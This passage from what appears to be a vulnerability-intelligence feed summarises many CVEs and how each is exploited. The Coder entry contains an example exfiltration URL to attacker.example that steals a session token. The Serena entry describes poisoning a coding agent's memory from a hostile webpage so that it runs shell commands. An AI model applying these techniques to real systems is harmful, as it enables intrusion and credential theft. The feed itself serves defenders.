FreeRDP GitHub Security Advisory GHSA-3mv2-5q57-2v8h and the VulnCheck advisory. CVSS 4.0 vector, 8.3 score, and CWE-362 are provided in the input; RCE is described as potential, not demonstrated. Not listed in CISA KEV and no EPSS score or public POC was provided, so real-world exploitation status is unknown; downstream package version ranges are not confirmed due to absent CPE data. ## Prevalence high ## Prevalence Basis core open-source RDP library embedded in many Linux remote-desktop clients ## Assessed CVSS Vector CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H ## Assessed CVSS Rationale Client-side flaw needing the victim to connect to a malicious server (UI:R) and to win a thread race (AC:H); heap corruption gives high availability impact with limited C/I. ## Assessed CVSS 4.0 Vector CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N
Path traversal in Flowise's Faiss and SimpleStore vector store implementations allows any holder of a valid API token to write vector store data to arbitrary filesystem locations, creating a practical path to remote code execution or data exfiltration on the hosting server. All Flowise deployments prior to version 3.1.0 are affected when either of these two vector store backends is configured. No public exploit code has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the post-authentication exploitation path is low-complexity, making timely patching critical especially in multi-tenant or shared deployments where API tokens are broadly distributed.
Remote code execution in the Blocksy Companion Pro WordPress plugin (all versions before 2.1.47) lets unauthenticated attackers upload executable PHP files through the Advanced Reviews feature, taking over the site. The save_attachments function relies on a flawed strpos() substring check inherited from the Custom Fonts extension, so a double-extension filename like shell.woff2.php passes validation while the server executes it as PHP. No public exploit has been identified at time of analysis, but a vendor patch (2.1.47) is available and the flaw was reported by VulnCheck.
Remote code execution in Apache Gravitino before 1.2.1 allows unauthenticated callers to abuse the testConnection API by submitting a crafted H2 JDBC URL whose INIT parameter runs arbitrary Java on the server. The flaw only manifests when Gravitino is backed by the H2 database - a configuration primarily used for testing and local development - and CISA SSVC rates technical impact as total and exploitation as automatable, though no public exploit has surfaced. Fixed in 1.2.1; because Gravitino is usually deployed on internal networks and H2 is not the production default, the vendor characterizes real-world severity as low despite the 9.1 CVSS score.
The Appointment Booking Calendar Plugin and Scheduling Plugin WordPress plugin through 1.1.28 does not validate data before passing it to a PHP deserialization function, allowing unauthenticated attackers to inject arbitrary PHP objects; where a suitable gadget chain is present on the site this can be leveraged to achieve remote code execution.
Arbitrary file upload in the WHMCS Bridge plugin for WordPress (all versions through 6.9) lets authenticated users with Custom-level access or above upload files of any type via the unvalidated connect() function, potentially achieving remote code execution on the host. Reported by Wordfence and tracked as CWE-434, the flaw carries a CVSS of 8.8; there is no public exploit identified at time of analysis and it is not listed in CISA KEV. The impact hinges on the plugin's failure to enforce file-type checks before writing uploaded content to disk.
Local privilege escalation to SYSTEM in Fuji Electric Pupsman before version 3.9.0 allows a low-privileged local user to drop a malicious executable into the weakly-permissioned installation directory, which is then run with SYSTEM privileges for full arbitrary code execution. Reported through JPCERT/CC (JVN JVN62347140); no public exploit identified and no active exploitation is confirmed at time of analysis. The CVSS 4.0 base score is 8.5 (High), reflecting complete confidentiality, integrity, and availability impact despite the local attack vector.
Local privilege escalation to arbitrary code execution affects Fuji Electric's Pupsman UPS management software in all versions prior to 3.9.0, where the installer insecurely loads a DLL from its own directory. A local attacker who can drop a malicious DLL into the folder containing the installer can have it executed with SYSTEM privilege the next time the installer is run. No public exploit identified at time of analysis and the flaw is not in CISA KEV; exploitation requires local file placement plus a victim executing the installer (UI:A).
Arbitrary file deletion in the Simple Coherent Form WordPress plugin (all versions up to and including 2.4.13) allows unauthenticated attackers to delete any file the web server can reach, and deleting wp-config.php can cascade into full remote code execution. The plugin's two intended access controls are illusory: the scf_get_id_upload endpoint hands a valid scf_upload_file_removal nonce to any anonymous visitor, and the secondary hash check can be reproduced offline because it derives from a salt hardcoded in the plugin source. There is no public exploit identified at time of analysis, but the flaw carries a high 9.1 CVSS and reflects a genuine unauthenticated-network attack path.
Remote code execution in the Widget Logic Visual WordPress plugin (all versions through 1.52) lets low-privileged authenticated users run arbitrary PHP on the server. The flaw stems from the widget-logic-update-conditional-tags AJAX action lacking a capability check and nonce verification, allowing any subscriber-and-above account to store attacker-controlled data in the 'nwlv[cod-tag]' parameter that is later passed to an eval() call by widget_logic_visual_check_visibility. Reported by Wordfence with no public exploit identified at time of analysis and no CISA KEV listing.
Arbitrary code execution on Code27 Companion Hub (firmware SQ3A.220705.003.A1) is achievable by a physically proximate attacker through improper access controls on the device's USB debugging (ADB) interface. The Android Debug Bridge component fails to enforce adequate restrictions, allowing an unauthenticated attacker with physical USB access to execute arbitrary commands at elevated privilege. A publicly available proof-of-concept exploit exists on GitHub, and SSVC assessment rates the technical impact as total despite no confirmed active exploitation in the wild.
Connection string injection in KEDA's PostgreSQL scaler allows low-privileged tenants to inject arbitrary libpq connection parameters by embedding tab, newline, or other non-space whitespace characters into ScaledObject or TriggerAuthentication configuration fields. The `escapePostgreConnectionParameter` function in `pkg/scalers/postgresql_scaler.go` only detects literal spaces before quoting values, leaving all other libpq token delimiters unescaped; successful exploitation forces TLS downgrade (sslmode=disable) or redirects database connections to attacker-controlled hosts to steal operator-supplied credentials. A working proof-of-concept YAML payload is included in GitHub advisory GHSA-6w3m-4hhp-775q; no CISA KEV listing was present at time of analysis.
Path traversal in Goploy's `/deploy/fileDiff` endpoint (versions <=1.17.5) enables any authenticated low-privilege member to read arbitrary files on both the Goploy host and every SFTP-managed remote server registered in the system. The dual file read returns local content in the `srcText` response field and remote server content in `distText`, multiplying the blast radius across all managed deployment targets. Publicly available exploit code exists per the GitHub Security Advisory; this is not listed in CISA KEV, but exploitation conditions are trivially met under default Goploy configuration.
Local arbitrary code execution affects an unspecified industrial control system (ICS) product reported through CISA ICS-CERT (advisory ICSA-26-188-06). A stack-based buffer overflow (CWE-121) lets an attacker who can supply crafted input trigger memory corruption and run arbitrary code once a local user interacts with the malicious data, fully compromising confidentiality, integrity, and availability. No public exploit identified at time of analysis and the affected vendor/product is not disclosed in the available data.
Arbitrary code execution in an unnamed ICS/OT application arises from a use-after-free (CWE-416) triggered when the software parses a specially crafted file, letting an attacker run code in the context of the current process. The flaw was reported through CISA's ICS-CERT (advisory ICSA-26-188-06) and carries a CVSS 4.0 base score of 8.4; exploitation is local and requires a user to open the malicious file. No public exploit code has been identified at time of analysis and the CVE is not listed in CISA KEV.
Arbitrary code execution via an out-of-bounds write (CWE-787) affects an industrial control system product covered by CISA ICS advisory ICSA-26-188-06, where an attacker can corrupt memory past an allocated buffer to run code in the context of the affected application. The CVSS 4.0 vector (AV:L/UI:A) indicates the flaw is triggered locally and requires a victim to actively interact - consistent with opening a malicious file or project in engineering/HMI software. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the high-impact memory corruption and DHS ICS-CERT reporting warrant prompt patching in OT environments.
DBI versions before 1.650 for Perl are vulnerable to code injection via caller-influenced Profile. When a string is assigned to a DBI handle's Profile attribute, DBI splits it into path, package and arguments, and interpolates the package part in a string eval with no validation of the package name. Any caller-influenced value that reaches the Profile attribute is therefore arbitrary Perl code execution, including calls to run system commands. The Profile attribute can be set from three different sources that can carry untrusted data: the DBI_PROFILE environment variable, a direct attribute assignment, and a DSN driver-attribute clause dbi:Driver(Profile=>SPEC):db. An attacker controlling any of those inputs runs arbitrary Perl in the host process. The strongest remote position is a network-exposed DBI::Gofer / DBI::ProxyServer whose per-request DSN reaches the Profile attribute, letting a client execute code on the broker host.
Remote code execution in Koodo Reader (versions 2.3.0 and earlier) lets an attacker who supplies a malicious EPUB file run arbitrary OS commands with the victim's privileges once the book is imported and opened. The flaw combines a dangerously permissive Electron IPC handler (nodeIntegrationInSubFrames enabled) with unsanitized innerHTML rendering of chapter content, turning ebook display into a Node.js code-execution primitive. No public exploit has been identified at time of analysis; the issue is fixed in version 2.3.1 and is not listed in CISA KEV.
Remote code execution in the Oraios Serena MCP coding toolkit (prior to v1.5.2) lets a malicious webpage hijack a developer's local coding agent via DNS rebinding. Serena's built-in web dashboard runs an unauthenticated Flask API on a fixed, predictable port with no auth, no CSRF protection, and no Host-header validation, so any site the victim visits while Serena is running can write attacker-controlled content into the agent's persistent memory store; because the agent autonomously reads that memory and can invoke execute_shell_command with shell=True, this chains to code execution on the developer's machine. No public exploit identified at time of analysis, and the flaw is not on the CISA KEV list.
Arbitrary Python code execution in calibre (e-book manager) before 9.10.0 lets attackers run code on a victim's machine simply by having them import or edit a malicious EPUB, OPF, or PDF. The crafted file embeds a custom column definition containing a python: template inside the calibre:user_metadata field, which calibre passes unsanitized to exec() in its template formatter during routine metadata reading (Add books / Edit books). No public exploit has been identified at time of analysis, but the flaw triggers through normal user workflows, making weaponized e-book files a realistic delivery vector.
Arbitrary code execution in DataEase before 2.10.24 lets authenticated users bypass H2 JDBC URL validation using special Unicode characters whose case conversion differs between DataEase's validator and the H2 parser, smuggling dangerous parameters such as INIT into a malicious H2 connection string. Because H2's INIT clause executes SQL/DDL at connection time, an attacker can run arbitrary code on the host. No public exploit has been identified at time of analysis, but a fix commit and release exist, making the mechanism reproducible from the public patch.
Remote code execution in DataEase before 2.10.24 allows an authenticated attacker to bypass the prior H2 zip-protocol and file-dropper hardening by uploading a ZIP archive masquerading as a font file (.ttf) via the FontManage.saveFile endpoint, then invoking the H2 database zip protocol against it to execute arbitrary code on the server. The flaw is a regression that defeats an earlier fix, and carries a CVSS 4.0 score of 8.7 (High). No public exploit has been identified at time of analysis, but the vendor GitHub Security Advisory (GHSA-8x36-774q-pwqg) and two remediation commits are published.
Remote code execution in Vtiger CRM before 8.4.0 lets an authenticated low-privileged user upload a malicious .phar file through the Documents module and execute arbitrary PHP. The extension denylist in config.inc.php omits .phar, and a stale Apache 2.2-syntax .htaccess is silently ignored on Apache 2.4, so the payload lands in a web-accessible directory reachable by unauthenticated HTTP - the attack begins authenticated but the final execution step is unauthenticated. Publicly available exploit code exists (published by VulnCheck/Jiva Security); no CISA KEV listing and no EPSS score were provided.
Authenticated remote code execution in Vtiger CRM through version 8.4.0 lets an administrator upload a crafted ZIP archive through the ModuleManager import feature and drop executable PHP files directly into the web-root modules/ directory, yielding a persistent web shell. Because Apache resolves and executes those PHP files before Vtiger's routing layer runs, the resulting shell bypasses the application's authentication entirely and survives independently of the attacker's login session. Publicly available exploit code exists (VulnCheck / Jiva Security), though there is no public exploit identified as being used in active attacks and it is not listed in CISA KEV.
Arbitrary file write in the AMP for WP - Accelerated Mobile Pages WordPress plugin (versions up to and including 1.1.12) lets authenticated Author-level users, granted permission by an Administrator, upload and unsafely extract a crafted ZIP through the ampforwp_save_local_font() function, planting attacker-controlled files in a web-accessible uploads path. On hosts configured to execute PHP from the uploads directory, this escalates to remote code execution. There is no public exploit identified at time of analysis, and the issue is not listed in CISA KEV; an upstream fix is present in the plugin repository (changeset 3512870).
Arbitrary file read in EGroupware's mail composition module allows any authenticated user with mail access to exfiltrate files readable by the web server process. The vulnerability stems from a defective URI scheme check in `api/src/Mail.php` that correctly rejects `data:` URIs but inadvertently permits `file://` URIs, which PHP's `file_get_contents()` resolves natively against the local filesystem. A publicly available proof-of-concept exists demonstrating `/etc/passwd` extraction via a crafted HTML email body; no active exploitation (CISA KEV) has been confirmed at time of analysis.
Authenticated OS command execution in EGroupware allows an administrator to escalate from web-application access to arbitrary shell commands as the web server user (typically www-data). The flaw lives in the eTemplate engine's Widget::expand_name(), where widget attribute values are passed into a PHP eval() with only double-quotes escaped, leaving backtick shell-execution operators intact; an admin uploads a malicious .xet template to the /etemplates VFS mount to trigger it. A detailed proof-of-concept is published in the vendor's GitHub Security Advisory (publicly available exploit code exists), though there is no evidence of active exploitation.
Remote code execution in EGroupware lets an attacker chain a broken authorization check with an arbitrary file write and an arbitrary file read to fully compromise the server. An authenticated user can forge the participant_role field in a SmallPartMediaRecorder::ajax_upload() request to impersonate a course teacher, then use path traversal to read and overwrite header.inc.php with valid but attacker-controlled PHP, yielding code execution after OPcache refresh or a setup-password change. Where self-registration is enabled the entire chain becomes reachable pre-authentication. No public exploit has been identified, but the advisory documents a complete, reproducible technique.
Remote code execution in Apache Airflow before 3.3.0 lets a DAG author embed a malicious trigger whose attacker-controlled class path is loaded via an unrestricted import_string() when the Scheduler or API Server deserializes the serialized DAG, executing arbitrary code in those privileged processes and breaking the core Airflow boundary that DAG-author code must never run in the Scheduler/API Server. Reported by Apache with a fix in 3.3.0, it currently has no public exploit identified and a low EPSS of 0.69% (48th percentile), and it is not listed in CISA KEV. The practical severity depends heavily on how much a deployment trusts its DAG authors, since exploitation requires the ability to submit a DAG.
Heap memory corruption in GIMP's PSD (Photoshop) file parser allows a malicious .psd image to overflow an integer in read_RLE_channel(), producing an undersized heap allocation for the RLE row-length table that is then overwritten row-by-row, potentially yielding denial of service or arbitrary code execution. The flaw affects GIMP as shipped across Red Hat Enterprise Linux 6 through 9 and is triggered when a victim opens or imports a crafted PSD file. There is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Remote code execution in the WPFunnels (Funnel Builder for WooCommerce) WordPress plugin versions up to and including 3.12.7 lets attackers write attacker-controlled 'postData' into a PHP-includeable .log file that wpfnl_show_log later renders with include_once, yielding server-side code execution. The initial injection is fully unauthenticated because the nonce guarding the optin endpoint is publicly emitted on every funnel step page, though execution only fires once an administrator opens the poisoned log via the Log Settings View while the 'Enable Logs' toggle is active. There is no public exploit identified at time of analysis and the CVE is not listed in CISA KEV, but the pre-auth injection combined with a maximal 9.8 CVSS score makes it a high-priority patch for any exposed WooCommerce funnel deployment.
Unauthenticated mass assignment in FOSSBilling's client self-registration endpoint (all versions prior to 0.8.0) allows any visitor to inject an arbitrary client group identifier during signup, bypassing group-based access controls on promotional codes. Attackers who successfully place themselves into a privileged group can redeem group-restricted discount codes and receive unauthorized price reductions. No public exploit or active exploitation has been identified; the CVSS 4.0 score of 6.9 reflects a limited, integrity-only impact with no confidentiality or availability consequence, and the erroneous 'RCE' source tag should be disregarded as inconsistent with the description and impact metrics.
Authenticated remote code execution in FOSSBilling 0.6.10 through 0.7.2 lets an admin-privileged user inject arbitrary PHP into config.php via the Config::prettyPrintArrayToPHP() method, which fails to escape single quotes in string configuration values. Because config.php is pulled in through a bare include on every HTTP request, injected code runs persistently on all subsequent requests. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV; the CVSS 4.0 base score is 8.9, elevated by the persistent, server-wide impact once an admin account is abused.
Session token leakage in Coder's CLI (github.com/coder/coder v2) lets a malicious template author steal a user's session token when the victim runs `coder open app`. The `coder open app` command opens external workspace-app URLs without scheme/host validation and substitutes the `$SESSION_TOKEN` placeholder with the user's real token before passing the URL to the OS open handler, so a workspace-controlled URL like `https://attacker.example/?t=$SESSION_TOKEN` exfiltrates the token and enables full account impersonation for its lifetime; the same path can invoke arbitrary local URI-scheme handlers. No public exploit identified at time of analysis, and it is not listed in CISA KEV.
Denial of service in Coder's coderd server allows any authenticated user with file-upload access to exhaust server memory by uploading a crafted zip bomb via POST /api/v2/files, crashing the service before RBAC checks execute. Affected versions span all supported release lines prior to v2.34.2, v2.33.8, v2.32.7, and v2.29.17 (ESR). No public exploit has been identified at time of analysis; the impact is strictly an availability loss - the advisory explicitly confirms no data disclosure or code execution is possible, contradicting the 'RCE' tag present in the intelligence feed.
SSH configuration injection leading to arbitrary code execution in Coder's `coder config-ssh` CLI command allows a malicious or compromised Coder server to write attacker-controlled directives into a developer's `~/.ssh/config`. The command copied server-supplied `HostnameSuffix` and `SSHConfigOptions` values verbatim without stripping newlines, letting an attacker in control of those values inject a directive such as `ProxyCommand` that runs on every SSH connection from the workstation. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; the issue was found and disclosed by Anthropic's Security Team and is fixed across all supported release lines.
Quick Facts
- Typical Severity
- CRITICAL
- Category
- other
- Total CVEs
- 31864